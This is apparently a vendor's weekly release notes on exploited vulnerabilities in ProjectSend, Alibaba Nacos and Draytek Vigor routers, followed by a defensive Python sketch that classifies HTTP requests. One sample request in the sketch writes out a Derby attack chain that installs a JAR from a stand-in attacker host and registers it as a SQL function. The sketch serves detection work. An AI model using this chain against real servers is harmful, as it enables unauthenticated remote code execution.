Happy Friday! Happy Thanksgiving to our US-based customers! The following are the VulnCheck Initial Access release notes for this holiday-shortened week:
On Monday, the team reserved a CVE for a vulnerability we believed to be exploited in the wild. On the same day we delivered an exploit, a version scanner, search engine queries, network signatures, a vulnerable Docker Compose environment, and a YARA rule. The team published the CVE, CVE-2024-11680, on Tuesday and provided wider intelligence to the community about exploitation in the wild. You can read the blog: ProjectSend CVE-2024-11680 Exploited in the Wild.
If you are a US-based reader, you likely will not have heard of Alibaba Nacos. However, it is fairly popular in Asia, with FOFA reporting roughly 100,000 installations and ZoomEye reporting more than 300,000. It should also be noted up front that the team believes this vulnerability has not been patched, so it is still applicable today.
By default, Nacos running in standalone mode exposes its embedded Apache Derby database to unauthenticated users, which allows arbitrary querying of data. The component responsible for authentication remains unpatched (current version 2.3.2), as stated in the initial advisory, and in standalone mode it continues to allow unauthenticated queries. Recently, a variant of the 2021 vulnerability was published that identified a new mechanism for uploading JAR files and registering Java classes as Derby SQL functions, which provides a previously undocumented path to remote code execution.
The team developed a payload class built with JDK 8 and an exploit that works against the well-documented 1.4.0 pre-CVE-2021-29442 vulnerability, as well as against a race condition in the 2.4.x versions that requires many requests to be sent before the JAR file is written to disk. The team additionally developed Suricata, YARA, and Snort rules for the vulnerabilities.
Draytek Vigor router models 300B, 2960, and 3900 before version 1.5.1 are affected by this remote code execution vulnerability, which is known to have been exploited by at least two named threat actors, most recently Flax Typhoon. The vulnerability consists of unsafe handling of user input in the login functionality. The team had previously delivered Snort and Suricata signatures, and Shodan, Censys, and GreyNoise queries. Today the team adds an exploit with a bind shell payload, another pcap of our proof of concept, and ZoomEye and FOFA queries.
Draytek Vigor router models 300B, 2960, and 3900 before version 1.5.1 are affected by this remote code execution vulnerability, and exploitation in the wild by the threat actor group Flax Typhoon has been observed. The vulnerability consists of a parsing error in the /cgi-bin/mainfunction.cgi/cvmcfgupload endpoint when a multipart request is sent with the Content-Type x-python-script. The team delivered an exploit with a bind shell payload, a pcap, Snort and Suricata signatures, and Shodan, Censys, ZoomEye, FOFA, and GreyNoise queries.
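The Nacos and Draytek items above both describe traffic that can be recognized on the wire, and the notes mention Snort, Suricata, and YARA coverage for each. As an added example that is not part of the VulnCheck release or of either project's code, the following Python sketches the request-level detection logic behind such signatures over constructed sample requests: for Nacos, a SELECT sent to the Derby ops endpoint (the unauthenticated read from the 2021 advisory) versus a request body carrying Derby's JAR install, classpath, and Java routine registration statements (the RCE mechanism the notes describe); for Draytek, a multipart POST to /cgi-bin/mainfunction.cgi/cvmcfgupload whose part carries an x-python-script Content-Type. Assumptions: the /nacos/v1/cs/ops/ prefix is taken from the 2021 Nacos advisory, the /nacos/v1/cs/ops/data/removal path in the sample is assumed, the Derby statements are standard Derby syntax, the class name p.Exec is made up, and all sample requests are constructed rather than captured.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample requests (not captured traffic); hosts use reserved addresses.
NACOS_READ = (
    "GET /nacos/v1/cs/ops/derby?sql=select+*+from+users HTTP/1.1\r\n"
    "Host: nacos.example.internal:8848\r\n\r\n"
)
# Ops path below is assumed for this sample; the statements are standard Derby
# syntax for loading a JAR and exposing a Java method as a SQL function. p.Exec is made up.
NACOS_JAR_CHAIN = (
    "POST /nacos/v1/cs/ops/data/removal HTTP/1.1\r\n"
    "Host: nacos.example.internal:8848\r\n"
    "Content-Type: multipart/form-data; boundary=vc\r\n\r\n"
    '--vc\r\nContent-Disposition: form-data; name="file"; filename="x.sql"\r\n\r\n'
    "CALL SQLJ.INSTALL_JAR('http://attacker.invalid/p.jar', 'APP.p', 0);\r\n"
    "CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath', 'APP.p');\r\n"
    "CREATE FUNCTION RUN(c VARCHAR(255)) RETURNS VARCHAR(255) LANGUAGE JAVA "
    "PARAMETER STYLE JAVA EXTERNAL NAME 'p.Exec.run';\r\n"
    "--vc--\r\n"
)
DRAYTEK_UPLOAD = (
    "POST /cgi-bin/mainfunction.cgi/cvmcfgupload HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "Content-Type: multipart/form-data; boundary=vc\r\n\r\n"
    '--vc\r\nContent-Disposition: form-data; name="file"; filename="config.cfg"\r\n'
    "Content-Type: x-python-script\r\n\r\n"
    "placeholder\r\n"
    "--vc--\r\n"
)


def parse_http_request(raw: str) -> dict:
    """Minimal HTTP/1.x splitter: request line, lowercased headers, raw body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    url = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": url.path,
            "query": parse_qs(url.query), "headers": headers, "body": body}


def parse_multipart(body: str, content_type: str) -> list:
    """Split a multipart/form-data body into parts with lowercased part headers."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return []
    parts = []
    for chunk in body.split("--" + m.group(1))[1:]:
        if chunk.startswith("--"):
            break  # closing delimiter reached
        head, _, data = chunk.lstrip("\r\n").partition("\r\n\r\n")
        headers = {}
        for line in head.split("\r\n"):
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        parts.append({"headers": headers, "data": data.rstrip("\r\n")})
    return parts


NACOS_OPS_PREFIX = "/nacos/v1/cs/ops/"  # Derby ops controller path from the 2021 advisory
DERBY_RCE_MARKERS = (
    (re.compile(r"\bSQLJ\.INSTALL_JAR\b", re.I), "derby-jar-install"),
    (re.compile(r"derby\.database\.classpath", re.I), "derby-classpath-set"),
    (re.compile(r"\bCREATE\s+(?:FUNCTION|PROCEDURE)\b.*?\bEXTERNAL\s+NAME\b",
                re.I | re.S), "derby-java-routine-registration"),
)


def classify_nacos_derby_request(raw: str):
    """None unless aimed at the Nacos ops endpoints; else a verdict dict."""
    req = parse_http_request(raw)
    if not req["path"].startswith(NACOS_OPS_PREFIX):
        return None
    # The GET derby endpoint carries SQL in the `sql` parameter; the JAR-upload
    # variant arrives in a request body, so both locations are inspected.
    sql = " ".join(req["query"].get("sql", [])) or unquote_plus(req["body"])
    hits = [tag for pat, tag in DERBY_RCE_MARKERS if pat.search(sql)]
    if hits:
        verdict = "rce-attempt"
    elif re.match(r"\s*select\b", sql, re.I):
        verdict, hits = "unauthenticated-read", ["derby-select"]
    else:
        verdict = "ops-endpoint-access"
    return {"verdict": verdict, "path": req["path"], "indicators": hits}


DRAYTEK_UPLOAD_PATH = "/cgi-bin/mainfunction.cgi/cvmcfgupload"


def detect_draytek_cvmcfgupload(raw: str):
    """None unless a multipart POST to cvmcfgupload; else parts typed x-python-script.
    Substring match so a text/x-python-script part is caught as well."""
    req = parse_http_request(raw)
    ctype = req["headers"].get("content-type", "")
    if (req["method"] != "POST" or req["path"] != DRAYTEK_UPLOAD_PATH
            or not ctype.lower().startswith("multipart/form-data")):
        return None
    hits = []
    for part in parse_multipart(req["body"], ctype):
        part_type = part["headers"].get("content-type", "").lower()
        if "x-python-script" in part_type:
            fn = re.search(r'filename="([^"]*)"',
                           part["headers"].get("content-disposition", ""))
            hits.append({"content_type": part_type,
                         "filename": fn.group(1) if fn else None})
    return hits


if __name__ == "__main__":
    print(classify_nacos_derby_request(NACOS_READ))
    print(classify_nacos_derby_request(NACOS_JAR_CHAIN))
    print(detect_draytek_cvmcfgupload(DRAYTEK_UPLOAD))
```

The Nacos classifier separates the two behaviours the notes distinguish: a plain SELECT against the ops endpoint is the long-known unauthenticated read, while JAR installation, classpath changes, or a Java routine registration in the same traffic is the newer code-execution path and deserves a higher-severity alert. The Draytek check keys on the combination the notes give (the cvmcfgupload endpoint plus an x-python-script part) rather than on either element alone, which keeps ordinary configuration uploads from firing it.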